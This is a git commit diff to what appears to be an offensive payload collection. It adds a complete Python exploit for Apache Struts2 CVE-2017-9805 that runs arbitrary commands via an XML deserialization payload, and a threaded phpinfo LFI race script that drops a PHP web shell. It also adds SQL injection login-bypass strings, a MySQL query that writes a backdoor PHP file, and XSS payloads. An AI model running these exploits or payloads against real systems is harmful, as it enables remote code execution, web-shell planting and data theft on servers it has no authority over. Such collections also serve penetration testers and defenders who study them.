Multiple update - LFI/RCE via phpinfo, Struts2 v2
parent
c36d31ec5d
commit
1ca215d5d7
|
@ -0,0 +1,324 @@
|
|||
#!/usr/bin/env python3
|
||||
# coding=utf-8
|
||||
# *****************************************************
|
||||
# struts-pwn: Apache Struts CVE-2017-9805 Exploit
|
||||
# Author:
|
||||
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
|
||||
# This code is based on:
|
||||
# https://github.com/rapid7/metasploit-framework/pull/8924
|
||||
# https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
|
||||
# *****************************************************
|
||||
import argparse
|
||||
import requests
|
||||
import sys
|
||||
|
||||
# Disable SSL warnings
|
||||
try:
|
||||
import requests.packages.urllib3
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if len(sys.argv) <= 1:
|
||||
print('[*] CVE: 2017-9805 - Apache Struts2 S2-052')
|
||||
print('[*] Struts-PWN - @mazen160')
|
||||
print('\n%s -h for help.' % (sys.argv[0]))
|
||||
exit(0)
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-u", "--url",
|
||||
dest="url",
|
||||
help="Check a single URL.",
|
||||
action='store')
|
||||
parser.add_argument("-l", "--list",
|
||||
dest="usedlist",
|
||||
help="Check a list of URLs.",
|
||||
action='store')
|
||||
parser.add_argument("-c", "--cmd",
|
||||
dest="cmd",
|
||||
help="Command to execute. (Default: 'echo test > /tmp/struts-pwn')",
|
||||
action='store',
|
||||
default='echo test > /tmp/struts-pwn')
|
||||
parser.add_argument("--exploit",
|
||||
dest="do_exploit",
|
||||
help="Exploit.",
|
||||
action='store_true')
|
||||
args = parser.parse_args()
|
||||
url = args.url if args.url else None
|
||||
usedlist = args.usedlist if args.usedlist else None
|
||||
url = args.url if args.url else None
|
||||
cmd = args.cmd if args.cmd else None
|
||||
do_exploit = args.do_exploit if args.do_exploit else None
|
||||
|
||||
|
||||
def url_prepare(url):
|
||||
url = url.replace('#', '%23')
|
||||
url = url.replace(' ', '%20')
|
||||
if ('://' not in url):
|
||||
url = str('http') + str('://') + str(url)
|
||||
return(url)
|
||||
|
||||
|
||||
def exploit(url, cmd, dont_print_status_on_console=False):
|
||||
url = url_prepare(url)
|
||||
if dont_print_status_on_console is False:
|
||||
print('\n[*] URL: %s' % (url))
|
||||
print('[*] CMD: %s' % (cmd))
|
||||
cmd = "".join(["<string>{0}</string>".format(_) for _ in cmd.split(" ")])
|
||||
|
||||
payload = """
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
||||
<dataHandler>
|
||||
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
||||
<is class="javax.crypto.CipherInputStream">
|
||||
<cipher class="javax.crypto.NullCipher">
|
||||
<initialized>false</initialized>
|
||||
<opmode>0</opmode>
|
||||
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="java.util.Collections$EmptyIterator"/>
|
||||
<next class="java.lang.ProcessBuilder">
|
||||
<command>
|
||||
{0}
|
||||
</command>
|
||||
<redirectErrorStream>false</redirectErrorStream>
|
||||
</next>
|
||||
</iter>
|
||||
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
||||
<method>
|
||||
<class>java.lang.ProcessBuilder</class>
|
||||
<name>start</name>
|
||||
<parameter-types/>
|
||||
</method>
|
||||
<name>foo</name>
|
||||
</filter>
|
||||
<next class="string">foo</next>
|
||||
</serviceIterator>
|
||||
<lock/>
|
||||
</cipher>
|
||||
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
||||
<ibuffer/>
|
||||
<done>false</done>
|
||||
<ostart>0</ostart>
|
||||
<ofinish>0</ofinish>
|
||||
<closed>false</closed>
|
||||
</is>
|
||||
<consumed>false</consumed>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
</map>
|
||||
""".format(cmd)
|
||||
|
||||
headers = {
|
||||
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
|
||||
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
|
||||
'Referer': str(url),
|
||||
'Content-Type': 'application/xml',
|
||||
'Accept': '*/*'
|
||||
}
|
||||
|
||||
timeout = 3
|
||||
try:
|
||||
output = requests.post(url, data=payload, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
|
||||
except Exception as e:
|
||||
print("EXCEPTION::::--> " + str(e))
|
||||
output = 'ERROR'
|
||||
return(output)
|
||||
|
||||
|
||||
def check(url):
|
||||
url = url_prepare(url)
|
||||
print('\n[*] URL: %s' % (url))
|
||||
|
||||
initial_request = exploit(url, "", dont_print_status_on_console=True)
|
||||
if initial_request == "ERROR":
|
||||
result = False
|
||||
print("The host does not respond as expected.")
|
||||
return(result)
|
||||
|
||||
payload_sleep_based_10seconds = """
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
||||
<dataHandler>
|
||||
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
||||
<is class="javax.crypto.CipherInputStream">
|
||||
<cipher class="javax.crypto.NullCipher">
|
||||
<initialized>false</initialized>
|
||||
<opmode>0</opmode>
|
||||
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="java.util.Collections$EmptyIterator"/>
|
||||
<next class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
|
||||
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
|
||||
<default>
|
||||
<__name>Pwnr</__name>
|
||||
<__bytecodes>
|
||||
<byte-array>yv66vgAAADIAMwoAAwAiBwAxBwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
|
||||
dFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
|
||||
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJD
|
||||
bGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5
|
||||
bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94
|
||||
c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy
|
||||
aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFs
|
||||
YW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUv
|
||||
eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9u
|
||||
cwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29t
|
||||
L3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3Vu
|
||||
L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7
|
||||
KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1B
|
||||
eGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFs
|
||||
L3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMu
|
||||
amF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNs
|
||||
ZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRp
|
||||
bWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcv
|
||||
YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFs
|
||||
L3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQAQamF2YS9sYW5nL1RocmVhZAcAKgEA
|
||||
BXNsZWVwAQAEKEopVgwALAAtCgArAC4BAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVy
|
||||
MTY3MTMxNTc4NjQ1ODk0AQAgTHlzb3NlcmlhbC9Qd25lcjE2NzEzMTU3ODY0NTg5NDsAIQACAAMA
|
||||
AQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0A
|
||||
AAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AMgAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0A
|
||||
AAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AMgAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAa
|
||||
AAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AMgAA
|
||||
AAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAiAAMA
|
||||
AgAAAA2nAAMBTBEnEIW4AC+xAAAAAQAwAAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJ
|
||||
</byte-array>
|
||||
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
|
||||
dFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
|
||||
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2Vy
|
||||
aWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2
|
||||
YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xh
|
||||
bmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRp
|
||||
bC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQAB
|
||||
AAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAA
|
||||
AAoAAQACABYAEAAJ</byte-array>
|
||||
</__bytecodes>
|
||||
<__transletIndex>-1</__transletIndex>
|
||||
<__indentNumber>0</__indentNumber>
|
||||
</default>
|
||||
<boolean>false</boolean>
|
||||
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
|
||||
</next>
|
||||
</iter>
|
||||
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
||||
<method>
|
||||
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
|
||||
<name>newTransformer</name>
|
||||
<parameter-types/>
|
||||
</method>
|
||||
<name>foo</name>
|
||||
</filter>
|
||||
<next class="string">foo</next>
|
||||
</serviceIterator>
|
||||
<lock/>
|
||||
</cipher>
|
||||
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
||||
<ibuffer/>
|
||||
<done>false</done>
|
||||
<ostart>0</ostart>
|
||||
<ofinish>0</ofinish>
|
||||
<closed>false</closed>
|
||||
</is>
|
||||
<consumed>false</consumed>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
</map>
|
||||
"""
|
||||
headers = {
|
||||
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
|
||||
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
|
||||
'Referer': str(url),
|
||||
'Content-Type': 'application/xml',
|
||||
'Accept': '*/*'
|
||||
}
|
||||
|
||||
timeout = 8
|
||||
try:
|
||||
requests.post(url, data=payload_sleep_based_10seconds, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
|
||||
# if the response returned before the request timeout.
|
||||
# then, the host should not be vulnerable.
|
||||
# The request should return > 10 seconds, while the timeout is 8.
|
||||
result = False
|
||||
except Exception:
|
||||
result = True
|
||||
return(result)
|
||||
|
||||
|
||||
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
|
||||
if url:
|
||||
if not do_exploit:
|
||||
result = check(url)
|
||||
output = '[*] Status: '
|
||||
if result is True:
|
||||
output += 'Vulnerable!'
|
||||
else:
|
||||
output += 'Not Affected.'
|
||||
print(output)
|
||||
else:
|
||||
exploit(url, cmd)
|
||||
print("[$] Request sent.")
|
||||
print("[.] If the host is vulnerable, the command will be executed in the background.")
|
||||
|
||||
if usedlist:
|
||||
URLs_List = []
|
||||
try:
|
||||
f_file = open(str(usedlist), 'r')
|
||||
URLs_List = f_file.read().replace('\r', '').split('\n')
|
||||
try:
|
||||
URLs_List.remove('')
|
||||
except ValueError:
|
||||
pass
|
||||
f_file.close()
|
||||
except Exception as e:
|
||||
print('Error: There was an error in reading list file.')
|
||||
print("Exception: " + str(e))
|
||||
exit(1)
|
||||
for url in URLs_List:
|
||||
if not do_exploit:
|
||||
result = check(url)
|
||||
output = '[*] Status: '
|
||||
if result is True:
|
||||
output += 'Vulnerable!'
|
||||
else:
|
||||
output += 'Not Affected.'
|
||||
print(output)
|
||||
else:
|
||||
exploit(url, cmd)
|
||||
print("[$] Request sent.")
|
||||
print("[.] If the host is vulnerable, the command will be executed in the background.")
|
||||
|
||||
print('[%] Done.')
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
|
||||
except KeyboardInterrupt:
|
||||
print('\nKeyboardInterrupt Detected.')
|
||||
print('Exiting...')
|
||||
exit(0)
|
|
@ -87,7 +87,13 @@ http://example.com/index.php?page=path/to/uploaded/file.png
|
|||
```
|
||||
You can injected the <?php system($_GET['c']); ?> into the metadata
|
||||
|
||||
## LFI to RCE via Phpinfo()
|
||||
https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
|
||||
Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
|
||||
|
||||
|
||||
## Thanks to
|
||||
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
|
||||
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
|
||||
* [Turning LFI to RFI ](https://l.avala.mp/?p=241)
|
||||
* [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
|
||||
|
|
|
@ -0,0 +1,192 @@
|
|||
#!/usr/bin/python
|
||||
# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
|
||||
import sys
|
||||
import threading
|
||||
import socket
|
||||
|
||||
def setup(host, port):
|
||||
TAG="Security Test"
|
||||
PAYLOAD="""%s\r
|
||||
<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
|
||||
REQ1_DATA="""-----------------------------7dbff1ded0714\r
|
||||
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
|
||||
Content-Type: text/plain\r
|
||||
\r
|
||||
%s
|
||||
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
|
||||
padding="A" * 5000
|
||||
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
|
||||
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
|
||||
HTTP_ACCEPT: """ + padding + """\r
|
||||
HTTP_USER_AGENT: """+padding+"""\r
|
||||
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
|
||||
HTTP_PRAGMA: """+padding+"""\r
|
||||
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
|
||||
Content-Length: %s\r
|
||||
Host: %s\r
|
||||
\r
|
||||
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
|
||||
#modify this to suit the LFI script
|
||||
LFIREQ="""GET /lfi.php?load=%s%%00 HTTP/1.1\r
|
||||
User-Agent: Mozilla/4.0\r
|
||||
Proxy-Connection: Keep-Alive\r
|
||||
Host: %s\r
|
||||
\r
|
||||
\r
|
||||
"""
|
||||
return (REQ1, TAG, LFIREQ)
|
||||
|
||||
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
||||
s.connect((host, port))
|
||||
s2.connect((host, port))
|
||||
|
||||
s.send(phpinforeq)
|
||||
d = ""
|
||||
while len(d) < offset:
|
||||
d += s.recv(offset)
|
||||
try:
|
||||
i = d.index("[tmp_name] =>")
|
||||
fn = d[i+17:i+31]
|
||||
except ValueError:
|
||||
return None
|
||||
|
||||
s2.send(lfireq % (fn, host))
|
||||
d = s2.recv(4096)
|
||||
s.close()
|
||||
s2.close()
|
||||
|
||||
if d.find(tag) != -1:
|
||||
return fn
|
||||
|
||||
counter=0
|
||||
class ThreadWorker(threading.Thread):
|
||||
def __init__(self, e, l, m, *args):
|
||||
threading.Thread.__init__(self)
|
||||
self.event = e
|
||||
self.lock = l
|
||||
self.maxattempts = m
|
||||
self.args = args
|
||||
|
||||
def run(self):
|
||||
global counter
|
||||
while not self.event.is_set():
|
||||
with self.lock:
|
||||
if counter >= self.maxattempts:
|
||||
return
|
||||
counter+=1
|
||||
|
||||
try:
|
||||
x = phpInfoLFI(*self.args)
|
||||
if self.event.is_set():
|
||||
break
|
||||
if x:
|
||||
print "\nGot it! Shell created in /tmp/g"
|
||||
self.event.set()
|
||||
|
||||
except socket.error:
|
||||
return
|
||||
|
||||
|
||||
def getOffset(host, port, phpinforeq):
|
||||
"""Gets offset of tmp_name in the php output"""
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host,port))
|
||||
s.send(phpinforeq)
|
||||
|
||||
d = ""
|
||||
while True:
|
||||
i = s.recv(4096)
|
||||
d+=i
|
||||
if i == "":
|
||||
break
|
||||
# detect the final chunk
|
||||
if i.endswith("0\r\n\r\n"):
|
||||
break
|
||||
s.close()
|
||||
i = d.find("[tmp_name] =>")
|
||||
if i == -1:
|
||||
raise ValueError("No php tmp_name in phpinfo output")
|
||||
|
||||
print "found %s at %i" % (d[i:i+10],i)
|
||||
# padded up a bit
|
||||
return i+256
|
||||
|
||||
def main():
|
||||
|
||||
print "LFI With PHPInfo()"
|
||||
print "-=" * 30
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print "Usage: %s host [port] [threads]" % sys.argv[0]
|
||||
sys.exit(1)
|
||||
|
||||
try:
|
||||
host = socket.gethostbyname(sys.argv[1])
|
||||
except socket.error, e:
|
||||
print "Error with hostname %s: %s" % (sys.argv[1], e)
|
||||
sys.exit(1)
|
||||
|
||||
port=80
|
||||
try:
|
||||
port = int(sys.argv[2])
|
||||
except IndexError:
|
||||
pass
|
||||
except ValueError, e:
|
||||
print "Error with port %d: %s" % (sys.argv[2], e)
|
||||
sys.exit(1)
|
||||
|
||||
poolsz=10
|
||||
try:
|
||||
poolsz = int(sys.argv[3])
|
||||
except IndexError:
|
||||
pass
|
||||
except ValueError, e:
|
||||
print "Error with poolsz %d: %s" % (sys.argv[3], e)
|
||||
sys.exit(1)
|
||||
|
||||
print "Getting initial offset...",
|
||||
reqphp, tag, reqlfi = setup(host, port)
|
||||
offset = getOffset(host, port, reqphp)
|
||||
sys.stdout.flush()
|
||||
|
||||
maxattempts = 1000
|
||||
e = threading.Event()
|
||||
l = threading.Lock()
|
||||
|
||||
print "Spawning worker pool (%d)..." % poolsz
|
||||
sys.stdout.flush()
|
||||
|
||||
tp = []
|
||||
for i in range(0,poolsz):
|
||||
tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
|
||||
|
||||
for t in tp:
|
||||
t.start()
|
||||
try:
|
||||
while not e.wait(1):
|
||||
if e.is_set():
|
||||
break
|
||||
with l:
|
||||
sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
|
||||
sys.stdout.flush()
|
||||
if counter >= maxattempts:
|
||||
break
|
||||
print
|
||||
if e.is_set():
|
||||
print "Woot! \m/"
|
||||
else:
|
||||
print ":("
|
||||
except KeyboardInterrupt:
|
||||
print "\nTelling threads to shutdown..."
|
||||
e.set()
|
||||
|
||||
print "Shuttin' down..."
|
||||
for t in tp:
|
||||
t.join()
|
||||
|
||||
if __name__=="__main__":
|
||||
print "Don't forget to modify the LFI URL"
|
||||
main()
|
|
@ -1,7 +1,7 @@
|
|||
# GIT - Source management
|
||||
|
||||
Github example
|
||||
1. Check 403 error (Forbidden) for .git or even better : directory listing
|
||||
## Github example with a .git
|
||||
1. Check 403 error (Forbidden) for .git or even better : directory listing
|
||||
|
||||
2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
|
||||
```
|
||||
|
@ -55,7 +55,7 @@ git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
|||
|
||||
|
||||
|
||||
5. Alternative way : diggit.py
|
||||
## Automatic way : diggit.py
|
||||
```
|
||||
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
|
||||
./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
|
||||
|
@ -65,7 +65,7 @@ git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
|||
-o is a hash of particular Git object to download
|
||||
```
|
||||
|
||||
5. Alternative way : rip-git
|
||||
## Alternative way : rip-git
|
||||
```
|
||||
perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
|
||||
|
||||
|
@ -82,7 +82,7 @@ git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
|
|||
|
||||
|
||||
# SVN - Source management
|
||||
SVN example (Wordpress)
|
||||
## SVN example (Wordpress)
|
||||
```
|
||||
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
||||
```
|
||||
|
@ -100,7 +100,7 @@ use first two signs from hash as folder name inside pristine/ directory (94 in t
|
|||
create complete path, which will be: http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base
|
||||
|
||||
|
||||
### Automatic way -
|
||||
## Automatic way -
|
||||
```
|
||||
git clone https://github.com/anantshri/svn-extractor.git
|
||||
python svn-extractor.py –url “url with .svn available”
|
||||
|
|
|
@ -54,6 +54,7 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
|||
```
|
||||
+BENCHMARK(40000000,SHA1(1337))+
|
||||
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
||||
```
|
||||
|
||||
|
||||
|
@ -71,4 +72,5 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
|||
##MYSQL DROP SHELL
|
||||
```
|
||||
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
||||
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
||||
```
|
||||
|
|
|
@ -123,6 +123,7 @@ or true--
|
|||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 2 like 2
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
|
@ -130,6 +131,14 @@ or 1=1/*
|
|||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '2' LIKE '1
|
||||
admin' or 2 LIKE 2--
|
||||
admin' or 2 LIKE 2#
|
||||
admin') or 2 LIKE 2#
|
||||
admin') or 2 LIKE 2--
|
||||
admin') or ('2' LIKE '2
|
||||
admin') or ('2' LIKE '2'#
|
||||
admin') or ('2' LIKE '2'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
|
@ -318,3 +327,4 @@ mysql> mysql> select version();
|
|||
- [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
|
||||
- [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
|
||||
- [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
|
||||
- [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
|
||||
|
|
|
@ -34,6 +34,7 @@ Basic payload
|
|||
|
||||
Img payload
|
||||
<img src=x onerror=alert('XSS');>
|
||||
<img src=x onerror=alert('XSS')//
|
||||
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
||||
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
|
||||
<img src=x:alert(alt) onerror=eval(src) alt=xss>
|
||||
|
@ -43,6 +44,7 @@ Img payload
|
|||
Svg payload
|
||||
<svgonload=alert(1)>
|
||||
<svg/onload=alert('XSS')>
|
||||
<svg onload=alert(1)//
|
||||
<svg/onload=alert(String.fromCharCode(88,83,83))>
|
||||
<svg id=alert(1) onload=eval(id)>
|
||||
"><svg/onload=alert(String.fromCharCode(88,83,83))>
|
||||
|
@ -92,6 +94,7 @@ banner.swf?clickTAG=javascript:alert(1);//
|
|||
io.swf?yid=\"));}catch(e){alert(1);}//
|
||||
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
|
||||
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
|
||||
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
|
||||
```
|
||||
|
||||
XSS in Hidden input
|
||||
|
@ -496,6 +499,10 @@ XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
|
|||
XSSObject.proxy(window, 'alert', 'window.alert', false);
|
||||
```
|
||||
|
||||
Bypass ">" using nothing #trololo (you don't need to close your tags)
|
||||
```
|
||||
<svg onload=alert(1)//
|
||||
```
|
||||
|
||||
Bypass ';' using another character
|
||||
```
|
||||
|
|
Loading…
Reference in New Issue